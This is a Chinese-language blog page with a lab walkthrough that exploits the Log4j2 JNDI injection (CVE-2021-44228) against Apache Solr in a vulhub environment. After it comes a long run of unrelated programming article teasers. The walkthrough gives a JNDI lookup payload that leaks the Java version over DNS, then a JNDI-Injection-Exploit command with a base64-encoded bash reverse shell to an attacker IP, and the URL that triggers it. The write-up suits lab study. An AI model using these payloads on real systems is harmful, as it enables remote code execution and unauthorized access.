当前位置：首页 > news >正文

vulhub中Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）

news 2026/5/23 6:12:28

Apache Log4j 2 是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入，执行任意代码。

1.服务启动后，访问`http://your-ip:8983`即可查看到Apache Solr的后台页面。

2.`${jndi:dns://${sys:java.version}.example.com}`是利用JNDI发送DNS请求的Payload，我们将其作为管理员接口的action参数值发送如下数据包：

GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

3.我们可以在DNS日志平台收到相关日志，显示出当前Java版本：

4.利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all获得shell，

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.64.43"

访问下面链接，成功反弹

http://192.168.188.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.64.43:1389/08zqfe}

参考：hrrps://blog.csdn.net/Bossfrank/article/details/130148819

vulhub中Apache Log4j2 lookup JNDI 注入漏洞（CVE-2021-44228）

Apache Log4j 2 是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入，执行任意代码。…...

编程日记 2024/2/21 0:07:11

智慧城市驿站：智慧公厕升级版，打造现代化城市生活的便捷配套

随着城市化进程的加速，人们对城市生活质量的要求也越来越高。作为智慧城市建设的一项重要组成部分，多功能城市智慧驿站应运而生。它集合了信息技术、设计美学、结构工艺、系统集成、环保节能等多个亮点，将现代科技与城市生活相融合&#xff0…...

编程日记 2024/2/21 0:06:10

大模型爆款应用fabric_构建优雅的提示

项目地址：https://github.com/danielmiessler/fabric 1 引言目前 fabric 已经获得了 5.3K Star，其中上周获得了 4.2K，成为了上周热榜的第二名（第一名是免费手机看电视的 Android 工具），可以算是爆款应用…...

编程日记 2024/2/21 0:03:08

js 对象属性描述符详解

文章目录一、value二、writable三、访问器属性：get和set四、configurable五、注意事项在 JavaScript 中，我们经常需要控制对象属性的特性，包括可写、可枚举等，本篇博客将介绍常见的对象属性使用及其特点。本篇博客我们用首先O…...

编程日记 2024/2/20 23:57:01

文件操作QFile

C中，QT的QFile 类是 Qt 框架中用于文件处理的一个类，它继承自 QIODevice。该类提供了一系列用于文件读写的功能，支持文本和二进制文件的处理。QFile 允许开发者方便地在本地文件系统中创建、读取、写入和操作文件。主要功能文件打开与关闭…...

编程日记 2024/2/20 23:56:00

【Langchain】+ 【baichuan】实现领域知识库【RAG】问答系统

本项目使用Langchain 和 baichuan 大模型， 结合领域百科词条数据（用xlsx保存），简单地实现了领域百科问答实现。 from langchain.text_splitter import CharacterTextSplitter, RecursiveCharacterTextSplitter from langchain_co…...

编程日记 2024/2/20 23:54:59

Anaconda、conda、pip、virtualenv的区别

① Anaconda Anaconda是一个包含180的科学包及其依赖项的发行版本。其包含的科学包包括：conda, numpy, scipy, ipython notebook等。 Anaconda具有如下特点： ▪ 开源 ▪ 安装过程简单 ▪ 高性能使用Python和R语言 ▪ 免费的社区支持其特点的实现…...

编程日记 2024/2/20 23:49:52

【数据结构】每天五分钟，快速入门数据结构（一）——数组

目录一.初始化语法二.特点三.数组中的元素默认值四.时间复杂度五.Java中的ArrayList类可变长度数组 1 使用 2 注意事项 3 实现原理 4 ArrayList源码 5 ArrayList方法一.初始化语法 // 数组动态初始化（先定义数组，指定数组长度&#xf…...

编程日记 2024/2/20 23:45:49

NBlog个人博客部署维护过程记录 -- 后端springboot + 前端vue

项目是fork的Naccl大佬NBlog项目，页面做的相当漂亮，所以选择了这个。可以参考2.3的效果图惭愧，工作两年了也没个自己的博客系统，趁着过年时间，开始搭建一下. NBlog原项目的github链接：Naccl/NBlog: &#…...

编程日记 2024/2/20 23:43:47

WireShark 安装指南：详细安装步骤和使用技巧

Wireshark是一个开源的网络协议分析工具，它能够捕获和分析网络数据包，并以用户友好的方式呈现这些数据包的内容。Wireshark 被广泛应用于网络故障排查、安全审计、教育及软件开发等领域。接下将讲解Wireshark的安装与简单使用。目录 Wireshark安装步骤…...

编程日记 2024/2/20 23:41:45

PyTorch detach()：深入解析与实战应用

PyTorch detach()：深入解析与实战应用 🌵文章目录🌵 🌳引言🌳🌳一、计算图与梯度传播🌳🌳二、detach()函数的作用🌳🌳三、detach()与requires_grad&#x1f3…...

编程日记 2024/2/20 23:40:44

uniapp 开发一个密码管理app

密码管理app 介绍最近发现自己的账号密码真的是太多了，各种网站，系统，公司内网的，很多站点在登陆的时候都要重新设置密码或者通过短信或者邮箱重新设置密码，真的很麻烦所以准备开发一个app用来记录这些站好和密码…...

编程日记 2024/2/20 23:39:43

Postman详细攻略

🍅 视频学习：文末有免费的配套视频可观看 🍅 点击文末小卡片，免费获取软件测试全套资料，资料在手，涨薪更快一、Postman背景介绍用户在开发或者调试网络程序或者是网页B/S模式的程序的时候是需要一些方法…...

编程日记 2024/2/20 23:38:42

如何在本地服务器部署TeslaMate并远程查看特斯拉汽车数据无需公网ip

文章目录 1. Docker部署TeslaMate2. 本地访问TeslaMate3. Linux安装Cpolar4. 配置TeslaMate公网地址5. 远程访问TeslaMate6. 固定TeslaMate公网地址7. 固定地址访问TeslaMate TeslaMate是一个开源软件，可以通过连接特斯拉账号，记录行驶历史，统…...

编程日记 2024/2/20 23:35:38

如何在CentOS安装SQL Server数据库并实现无公网ip环境远程连接

文章目录前言1. 安装sql server2. 局域网测试连接3. 安装cpolar内网穿透4. 将sqlserver映射到公网5. 公网远程连接6.固定连接公网地址7.使用固定公网地址连接前言简单几步实现在Linux centos环境下安装部署sql server数据库，并结合cpolar内网穿透工具&#xff0…...

编程日记 2024/2/20 23:29:32

备战蓝桥杯 Day5

1191：流感传染【题目描述】有一批易感人群住在网格状的宿舍区内，宿舍区为n*n的矩阵，每个格点为一个房间，房间里可能住人，也可能空着。在第一天，有些房间里的人得了流感，以后每天，得…...

编程日记 2024/2/20 23:24:24

1.终端运行scrapy startproject movie,创建项目 2.接口查找 3.终端cd到spiders,cd scrapy_carhome/scrapy_movie/spiders,运行 scrapy genspider mv https://dy2018.com/ 4.打开mv,编写代码,爬取电影名和网址 5.用爬取的网址请求,使用meta属性传递name ,callback调用自定义的…...

编程日记 2024/2/20 23:19:18

Unity笔记：数据持久化的几种方式

正文主要方法： ScriptableObjectPlayerPrefsJSONXML数据库（如Sqlite） 1. PlayerPerfs PlayerPrefs 存储的数据是全局共享的，它们存储在用户设备的本地存储中，并且可以被应用程序的所有部分访问。这意味着&#xf…...

编程日记 2024/2/20 23:16:15

MySQL 基础知识（八）之用户权限管理

目录 1 MySQL 权限管理概念 2 用户管理 2.1 创建用户 2.2 查看当前登录用户 2.3 修改用户名 2.4 删除用户 3 授予权限 3.1 授予用户管理员权限 3.2 授予用户数据库权限 3.3 授予用户表权限 3.4 授予用户列权限 4 查询权限 5 回收权限 1 MySQL 权限管理概念关于 M…...

编程日记 2024/2/20 23:13:12

QT编写工具基本流程(自用)

以后有人让你写工具的时候，可以方便用这个模版及时提高工作效率，可以争取早点下班。包含库目录，头文件目录，输出目录以及翻译和部署，基本上都全了，也可以做收藏用用。文章目录 1、创建项目Dialog Widget都…...

编程日记 2024/2/20 23:11:10

Ventoy主题定制完全指南：让你的启动界面焕然一新！

Ventoy主题定制完全指南：让你的启动界面焕然一新！ 【免费下载链接】Ventoy A new bootable USB solution. 项目地址: https://gitcode.com/GitHub_Trending/ve/Ventoy 还在使用单调乏味的启动界面吗？Ventoy作为一款革命性的可启动U盘解…...

编程新知 2026/5/23 4:53:49

编译和链接(以Windows,VS环境下C语言为例)

编译和链接(以Windows,VS环境下C语言为例）一.什么是翻译环境和运行环境？二.翻译环境2.1预处理(预编译)2.2编译2.2.1词法分析2.2.2语法分析2.2.3语义分析2.3汇编2.4链接三.运行环境提前说明一下，虽然说我们是以Windows操作系统为例&#xff0c…...

编程新知 2026/5/23 4:06:41

诚邀您参加 2026 Google Cloud Startup Day

以下文章来源于谷歌云服务，作者 Google Cloud...

编程新知 2026/5/23 4:04:40

A51汇编器Error 21解析与8051开发实践

1. 解析A51汇编器Error 21的根源与应对策略在8051单片机开发过程中，使用Keil C51工具链的A51汇编器时，开发者常会遇到一个令人困惑的报错："ERROR #21: EXPRESSION WITH FORWARD REFERENCE NOT PERMITTED"。这个错误看似简单&#x…...

编程新知 2026/5/23 3:58:39